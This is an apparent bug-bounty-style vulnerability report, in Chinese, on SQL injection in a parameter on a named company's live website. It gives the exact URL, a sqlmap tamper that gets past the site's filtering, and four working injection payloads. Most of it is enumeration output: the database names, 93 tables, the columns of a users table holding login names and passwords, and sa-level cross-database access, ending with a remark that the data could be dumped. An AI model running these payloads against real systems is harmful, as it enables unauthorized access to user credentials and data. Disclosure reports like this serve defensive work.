### 简要描述:
coremail官网存在注入,有防护,可绕过。
### 详细说明:
漏洞地址:http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412
### 漏洞证明:
有防护,直接用sqlmap加个tamper=chardoubleencode.py可以跑出来。
这个是sqlmap用的payload:
Place: GET
Parameter: lcid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lcid=412) AND 4972=4972 AND (7728=7728
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: lcid=412) UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(116)+CHAR(65)+CHAR(115)+CHAR(111)+CHAR(66)+CHAR(77)+CHAR(112)+CHAR(118)+CHAR(77)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lcid=412) AND 6450=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8683=8683
---
跑出的基本内容:
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
跑出来的数据库:
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ysxx201412197372
当前库自然就是ysxx201412197372,
数据表:
back-end DBMS: Microsoft SQL Server 2005
Database: ysxx201412197372
[93 tables]
+----------------------------+
| Whir_Cmn_Area |
| Whir_Cnt_Attached |
| Whir_Cnt_CreateLog |
| Whir_Cnt_Relation |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectColumn |
| Whir_Cnt_WorkFlowLogs |
| Whir_Dev_Column |
| Whir_Dev_ConfigStrategy |
| Whir_Dev_Field |
| Whir_Dev_FormArea |
| Whir_Dev_FormArea |
| Whir_Dev_FormDate |
| Whir_Dev_FormOption |
| Whir_Dev_FormUpload |
| Whir_Dev_Menu |
| Whir_Dev_Model |
| Whir_Dev_Module |
| Whir_Dev_Plugin |
| Whir_Dev_SubmitForm |
| Whir_Ext_AuditActivity |
| Whir_Ext_Backup |
| Whir_Ext_CollectField |
| Whir_Ext_CollectField |
| Whir_Ext_Gather |
| Whir_Ext_GatherTable |
| Whir_Ext_OperateLog |
| Whir_Ext_SendEmailRecord |
| Whir_Ext_SensitiveWords |
| Whir_Ext_Tools |
| Whir_Ext_Upload |
| Whir_Ext_WorkFlow |
| Whir_Mem_MemberGroup |
| Whir_Mem_MemberGroup |
| Whir_Oa_NewsConfig |
| Whir_Oa_NewsTemp |
| Whir_Plu_AdvertPosition |
| Whir_Plu_AdvertPosition |
| Whir_Plu_SiteMap |
| Whir_Sec_Resources |
| Whir_Sec_RolesInResources |
| Whir_Sec_RolesInResources |
| Whir_Sec_Users |
| Whir_Sit_SiteInfo |
| Whir_U_Category_Bak |
| Whir_U_Category_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Category |
| Whir_U_Download_Bak |
| Whir_U_Download_Bak |
| Whir_U_Download_Category |
| Whir_U_Feedback_Bak |
| Whir_U_Feedback_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Category |
| Whir_U_Jobs_JobRequest |
| Whir_U_Links_Bak |
| Whir_U_Links_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Chapter |
| Whir_U_Magazine_Infor |
| Whir_U_Product_Bak |
| Whir_U_Product_Bak |
| Whir_U_Product_Category |
| Whir_U_SalesNet_Bak |
| Whir_U_SalesNet_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Category |
| Whir_U_SubForms_Bak |
| Whir_U_SubForms_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Category |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Bak |
| Whir_U_Survey_Detail |
| Whir_U_Survey_Question |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Bak |
| Whir_U_Vote_Detail |
+----------------------------+
下面是表:Whir_Sec_Users
Table: Whir_Sec_Users
[19 columns]
+----------------+
| Column |
+----------------+
| CreateDate |
| CreateUser |
| Email |
| IsDel |
| LastLoginIP |
| LastLoginTime |
| LoginName |
| LoginType |
| Password |
| RealName |
| Remarks |
| RolesId |
| Sort |
| State |
| SystemLanguage |
| SystemSkin |
| UpdateDate |
| UpdateUser |
| UserId |
+----------------+
[<img src="https://images.seebug.org/upload/201504/2123174057d2cd3c9fe987c277d64a5b215c05d1.jpg" alt="8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2123174057d2cd3c9fe987c277d64a5b215c05d1.jpg)
当前用户sa,可以跨库查询:
Database: ReportServer
[27 tables]
+--------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| ChunkData |
| ConfigurationInfo |
| DataSource |
| Event |
| ExecutionLog |
| History |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| ServerParametersInstance |
| SnapshotData |
| Subscriptions |
| UpgradeInfo |
| Users |
| Catalog |
| Keys |
+--------------------------+
可以拖库。。。。-_-
我没拖,
没拖,
拖....
京公网安备 11010502034610号
暂无评论